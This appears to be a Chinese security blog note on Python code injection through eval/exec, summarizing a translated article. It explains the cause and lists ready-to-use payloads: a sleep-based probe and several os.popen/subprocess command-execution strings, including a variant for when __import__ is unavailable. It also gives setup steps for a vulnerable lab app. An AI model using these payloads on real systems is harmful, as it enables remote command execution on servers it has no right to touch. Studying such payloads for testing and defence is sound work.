【奇技淫巧】python代码注入

1.限号季,发一下之前的一点笔记写的很浅显希望各位大佬勿喷

.在挖掘某专属厂商的时候出现了一个有意思的地方,python代码执行

2.简单的进行验证一下可以发现sleep进行了执行

3.基本确定存在python代码执行漏洞,但是如何利用呢,翻到一篇安全客的文章https://www.anquanke.com/post/id/84891 是一篇翻译的文章 ,简单的进行解析一下(www.xiaomi8.cn)。

文章解析:

python代码注入的原因:

当你在网上搜索关于python的eval函数时,几乎没有文章会提醒你这个函数是非常不安全的,而eval函数就是导致这个Python代码注入漏洞的罪魁祸首。如果你遇到了下面这两种情况,说明你的Web应用中存在这个漏洞:

1. Web应用接受用户输入(例如GET/POST参数,cookie值);

2. Web应用使用了一种不安全的方法来将用户的输入数据传递给eval函数(没有经过安全审查,或者缺少安全保护机制);

3.除了eval函数之外,Python的exec函数也有可能让你的Web应用中出现这个漏洞

这是文章中给的示例代码

总结来说就是使用了eval 和exec函数没有进行过滤

4.然后作者提供了几个验证的payload

1.通过返回时间验证

eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))上面已经给了验证

2.命令执行

eval(compile("""for x in range(1):n import osn os.popen(r'COMMAND').read""",'','single'))

3.eval(compile("""__import__('os').popen(r'COMMAND').read""",'','single'))命令执行

4.__import__('os').popen('COMMAND').read命令执行

5.作者提供了一个python代码执行利用工具https://github.com/sethsec/PyCodeInjection ,自己简单测试了一下,没成功有兴趣的可以研究一下

作者提供的复现环境:

gitclone https://github.com/sethsec/PyCodeInjection.git

cd VulnApp

./install_requirements.sh

python PyCodeInjectionApp.py

6.作者还提到了一个场景当全局函数“__import__”会不起作用的时候可以利用for循环

eval(compile( """for x in range(1):n import osn os.popen(r'COMMAND').read""", '', 'single')) eval(compile( """for x in range(1):n import subprocessn subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE).stdout.read""", '', 'single')) eval(compile( """for x in range(1):n import subprocessn subprocess.check_output(r'COMMAND',shell=True)""", '', 'single'))

另外作者提到了一个点:为了将这个Payload发送给目标Web应用,你需要对其中的某些字符进行URL编码,但是我在进行验证的时候并不需要可能是场景的问题,具体的话还有很多需要探索的。

如何检测:这是作者提供的,我简单的理解就是hhh用burp或者扫描器检测

具体也去搜索了一下发现国内并没有多少python代码注入漏洞的文章,如果有更好的检测方法可以在下面留言

主营产品:热量表,温控,水表